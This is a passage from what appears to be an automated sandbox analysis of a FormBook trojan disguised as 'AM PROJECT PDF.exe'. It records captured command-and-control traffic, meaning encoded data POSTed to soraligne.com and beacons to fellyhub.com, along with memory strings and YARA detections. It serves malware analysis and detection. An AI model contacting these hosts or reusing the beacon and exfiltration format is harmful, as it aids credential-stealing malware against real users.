A0G=qgDxr4VVeFbjNgxXs1AmD-LKxvpjpTebqVKBKQu6UP5wD0Wzikuqx7yNZrejWNTL8J6qz_l_8108ULBB9HsQSo1vJYnsw-7MwA5DXq~lvDKSQZkLPzRVcAnk2YpgeaRWMc5GQ3fo9H1OqIGeJlR76p2tKcQilPtMelsM(TjeUYldZcZwpA).
Source: global traffic	HTTP traffic detected: POST /rdny/ HTTP/1.1Host: www.soraligne.comConnection: closeContent-Length: 5333Cache-Control: no-cacheOrigin: http://www.soraligne.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.soraligne.com/rdny/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 30 47 3d 71 67 44 78 72 34 56 56 65 46 62 6a 4d 41 42 58 67 32 59 6d 58 75 4c 4e 39 50 70 6a 6a 7a 65 66 71 56 57 42 4b 56 44 78 55 63 56 77 41 6c 47 7a 68 47 57 71 7a 37 79 4e 62 72 65 76 62 74 53 65 38 4a 75 41 7a 36 42 42 38 33 34 38 56 61 39 42 30 48 73 52 51 49 31 73 49 6f 6d 36 30 2d 37 4d 77 41 31 70 58 76 4b 62 76 43 69 53 51 71 73 4c 50 78 35 55 63 51 6e 6c 70 6f 70 67 65 61 63 57 4d 63 35 38 51 7a 79 33 39 48 56 4f 6c 35 32 65 50 30 52 30 39 35 32 33 4c 63 52 58 75 63 38 43 56 56 73 30 30 51 37 69 66 4e 38 5f 4d 2d 55 34 32 37 32 42 77 74 68 78 35 78 68 78 46 77 6a 6e 4d 36 75 42 61 62 67 6d 4c 31 6e 57 56 42 4f 4b 72 4e 56 33 61 4c 78 4f 48 44 44 31 34 6c 7a 76 79 31 73 43 74 33 66 4a 77 45 72 67 49 7a 37 74 63 70 34 41 64 62 68 50 63 59 74 56 45 71 44 30 51 68 6b 55 6a 59 39 53 79 47 56 31 71 32 4c 51 28 44 4c 61 56 71 53 78 37 65 4b 73 73 6b 71 55 7e 59 4b 4d 74 42 67 71 33 46 69 47 4e 35 73 57 49 6b 70 62 72 54 59 73 6d 57 50 71 34 44 39 73 79 48 62 66 50 57 4e 50 37 67 28 75 47 65 37 59 64 59 71 5f 75 6f 59 69 6f 6d 6c 63 35 48 7e 31 36 78 70 55 76 33 43 58 34 31 52 51 48 51 55 65 7a 51 50 72 66 66 54 48 74 55 7a 76 4d 51 39 71 70 73 57 67 6c 78 55 61 7e 44 79 61 4f 59 4b 76 79 76 79 79 67 36 63 41 43 2d 58 78 52 5a 32 58 6c 51 61 39 7a 35 59 6d 6e 6c 4d 71 77 42 73 50 34 56 37 4e 6b 5f 57 64 73 65 6c 2d 77 5a 71 64 6b 4e 6a 52 6c 34 6f 4a 6d 31 52 34 28 55 55 51 42 58 43 46 39 61 71 65 69 56 43 32 6a 4b 39 64 42 36 4b 2d 44 63 38 6d 72 41 30 53 31 49 71 4e 30 74 43 38 35 52 4d 4f 78 43 6c 71 33 31 37 48 6d 70 39 4b 55 5f 4f 75 42 6f 76 76 6d 48 32 30 6a 6b 58 43 64 4f 4a 73 77 71 59 73 48 73 63 72 36 33 36 39 55 55 73 42 51 6a 56 35 7a 65 58 6b 4d 52 30 37 6c 4c 64 64 6d 47 28 4a 72 74 5a 57 51 31 5a 4f 4c 75 4a 47 50 6b 6a 69 31 53 34 74 55 69 59 72 6c 54 76 57 49 4a 6f 51 36 6b 4f 47 42 76 67 30 54 49 49 53 78 30 71 4d 76 6f 52 42 72 7a 4a 53 68 78 69 48 77 51 7e 57 35 30 6b 6a 42 64 6f 73 43 56 65 63 69 52 30 7a 37 69 48 71 31 51 69 65 4d 74 52 41 30 37 45 72 56 73 53 68 37 35 57 68 32 36 49 47 70 48 28 53 37 53 45 33 56 30 69 65 6e 66 6c 50 4c 56 6b 70 54 6e 39 59 51 50 31 59 66 52 62 4f 47 53 57 48 51 52 56 4b 51 62 49 6d 63 6e 75 30 63 69 4b 38 68 47 34 66 57 6c 44 55 6e 42 64 34 74 59 72 34 57 7a 43 78 5a 72 56 71 6f 4d 51 4d 48 5a 42 76 54 46 55 6a 4d 4c 75 48 36 6d 4a 6a 35 69 71 43 4e 36 54 30 65 44 69 47 36 58 7e 75 71 36 4e 56 52 4b 45 76 73 74 55 6c 38 5a 79 6f 74 56 78 5f 32 43 4e 34 79 62 35 4c 55 46 30 4c 44 52 78 6a 43 49 71 4d 58 32 38 33 51 35 48 57 6c 57 4c 48 32 75 46 4e 47 64 52 4f 4b 6b 47 58 48 50 75 6e 71 7

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 23 Sep 2022 06:02:05 GMTContent-Type: text/htmlContent-Length: 291ETag: "6324a85f-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>

Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fontfabrik.com
Source: AM PROJECT PDF.exe	String found in binary or memory: http://github.com/CJxD/CoreView
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://vlovemeiwonv.cafe24.com/js/jquery-1.12.4.min.js?ver=191202
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://vlovemeiwonv.cafe24.com/js/jquery-migrate-1.4.1.min.js?ver=191202
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fellyhub.com
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fellyhub.com/bbs
Source: svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fellyhub.com/bbs/board.php?bo_table=photo
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fellyhub.com/bbs/board.php?bo_table=photo&wr_id=1
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fellyhub.com/bbs/board.php?bo_table=photo&wr_id=2
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fellyhub.com/bbs/board.php?bo_table=photo&wr_id=3
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fellyhub.com/bbs/board.php?bo_table=photo&wr_id=4
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fellyhub.com/bbs/board.php?bo_table=photo&wr_id=5
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fellyhub.com/bbs/board.php?bo_table=photo&wr_id=6
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fellyhub.com/bbs/content.php?co_id=company
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fellyhub.com/bbs/content.php?co_id=privacy
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fellyhub.com/bbs/content.php?co_id=provision
Source: svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fellyhub.com/bbs/free.php
Source: svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fellyhub.com/bbs/gallery.php
Source: svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fellyhub.com/bbs/login_check.php
Source: svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fellyhub.com/bbs/notice.php
Source: svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fellyhub.com/bbs/password_lost.php
Source: svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fellyhub.com/bbs/qa.php
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fellyhub.com/bbs/register.php
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fellyhub.com/js/common.js?ver=220620
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fellyhub.com/js/html5.js
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fellyhub.com/js/jquery-1.12.4.min.js?ver=220620
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fellyhub.com/js/jquery-migrate-1.4.1.min.js?ver=220620
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fellyhub.com/js/placeholders.min.js?ver=220620
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fellyhub.com/js/wrest.js?ver=220620
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fellyhub.com/plugin/pwa/images/icons/icon-72x72.png
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fellyhub.com/theme/tailwind0.3
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fellyhub.com/theme/tailwind0.3/css/balloon.css?ver=220620
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fellyhub.com/theme/tailwind0.3/css/dark.css?ver=220620
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fellyhub.com/theme/tailwind0.3/css/tailwind.min.css?ver=220620
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fellyhub.com/theme/tailwind0.3/img/main_bn.jpg
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fellyhub.com/theme/tailwind0.3/js/common.js?ver=220620
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fellyhub.com/theme/tailwind0.3/js/jquery.menu.js?ver=220620
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fellyhub.com/theme/tailwind0.3/js/sweetalert2.min.js?ver=220620
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fellyhub.com/theme/tailwind0.3/js/swiper.min.css?ver=220620
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fellyhub.com/theme/tailwind0.3/js/swiper.min.js?ver=220620
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fellyhub.com/theme/tailwind0.3/skin/latest/pic_list/style.css?ver=220620
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: 262I-Au.18.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 262I-Au.18.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 262I-Au.18.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: svchost.exe, 00000012.00000003.502087892.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, 262I-Au.18.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 262I-Au.18.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 00000012.00000003.502087892.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, 262I-Au.18.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: svchost.exe, 00000012.00000003.502087892.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, 262I-Au.18.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: svchost.exe, 00000012.00000003.502087892.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, 262I-Au.18.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: svchost.exe, 00000012.00000003.502087892.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, 262I-Au.18.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://use.fontawesome.com/releases/v5.3.1/css/all.css
Source: svchost.exe, 00000012.00000003.502087892.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, 262I-Au.18.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

HTTP traffic detected: POST /rdny/ HTTP/1.1Host: www.soraligne.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.soraligne.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.soraligne.com/rdny/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 30 47 3d 71 67 44 78 72 34 56 56 65 46 62 6a 4e 58 74 58 76 47 59 6d 58 4f 4c 4b 34 50 70 68 70 54 65 41 71 56 4b 46 4b 56 44 78 55 64 5a 77 41 6d 7e 7a 68 57 57 71 77 37 79 4d 52 4c 65 76 62 74 53 66 38 4a 37 46 7a 36 46 5f 38 31 51 38 55 4b 64 42 39 32 73 52 54 6f 31 74 61 59 6d 36 36 65 37 56 77 41 6b 55 58 75 32 6c 76 41 69 53 51 6f 6b 4c 50 42 35 55 5a 67 6e 6c 35 34 70 37 58 36 51 58 4d 63 35 6f 51 33 65 4e 39 45 4e 4f 71 38 69 65 49 44 46 30 6a 35 32 31 4c 63 52 64 6a 38 77 6a 56 56 51 37 30 56 53 76 66 4f 59 5f 4d 65 55 34 31 34 65 42 7e 4e 68 77 6b 42 68 73 46 77 7e 38 4d 36 6d 42 61 61 6b 51 4c 47 33 57 55 68 65 4b 69 4c 70 77 42 4c 78 4d 49 6a 44 6d 79 46 4f 30 79 31 38 47 74 32 58 4a 77 31 66 67 4c 6b 6e 74 61 4c 67 41 41 4c 68 44 63 59 74 4f 61 61 65 57 51 6c 45 71 6a 61 31 53 79 31 52 31 74 6b 54 51 36 53 4c 61 58 71 53 38 38 65 4b 31 73 6b 71 6d 7e 59 4f 4d 74 42 56 66 33 47 47 47 4f 6f 38 57 59 6b 70 61 28 6a 59 72 39 57 4f 79 38 44 39 34 79 48 76 6c 50 58 39 66 34 51 37 75 48 5a 6e 59 65 4a 71 5f 78 6f 59 6e 74 6d 6c 52 35 48 79 61 36 77 46 36 76 79 75 58 34 6c 35 51 48 54 4d 65 30 44 6e 72 57 5f 54 47 6e 30 79 38 44 31 5a 6c 39 76 69 4d 69 43 49 6e 39 55 33 4c 4e 73 54 7a 6d 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: A0G=qgDxr4VVeFbjNXtXvGYmXOLK4PphpTeAqVKFKVDxUdZwAm~zhWWqw7yMRLevbtSf8J7Fz6F_81Q8UKdB92sRTo1taYm66e7VwAkUXu2lvAiSQokLPB5UZgnl54p7X6QXMc5oQ3eN9ENOq8ieIDF0j521LcRdj8wjVVQ70VSvfOY_MeU414eB~NhwkBhsFw~8M6mBaakQLG3WUheKiLpwBLxMIjDmyFO0y18Gt2XJw1fgLkntaLgAALhDcYtOaaeWQlEqja1Sy1R1tkTQ6SLaXqS88eK1skqm~YOMtBVf3GGGOo8WYkpa(jYr9WOy8D94yHvlPX9f4Q7uHZnYeJq_xoYntmlR5Hya6wF6vyuX4l5QHTMe0DnrW_TGn0y8D1Zl9viMiCIn9U3LNsTzmQ).

Source: unknown

DNS traffic detected: queries for: www.fellyhub.com

Source: global traffic	HTTP traffic detected: GET /rdny/?7n-=6lYX&A0G=dZ8Ayr2drPdNVPVmuvzgGnZ5EDtn0CBwsWjIF75G8uy0K/UwgFE8TCCkfo+4feZhoJ7iWr04K24a/vrIrcJXcRwwE/YP1kXGBw== HTTP/1.1Host: www.fellyhub.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /rdny/?A0G=nirRoMghSnbgIhB91EMNSfP7/7ht0QeVg0GeLwyPWvopBgzqt2G+p533L6eaW6GeyJy3z9ND4nEybKooy0llY69rAo//5MT1xA==&7n-=6lYX HTTP/1.1Host: www.soraligne.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: AM PROJECT PDF.exe, 00000000.00000002.299387212.00000000007DA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 00000012.00000002.520390318.00000000010B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.519325021.0000000001080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.423862001.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.517474120.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.373978746.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.402693120.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000012.00000002.520390318.00000000010B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000012.00000002.520390318.00000000010B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.520390318.00000000010B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.519325021.0000000001080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000012.00000002.519325021.0000000001080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.519325021.0000000001080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.423862001.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.423862001.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.423862001.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.517474120.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000012.00000002.517474120.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
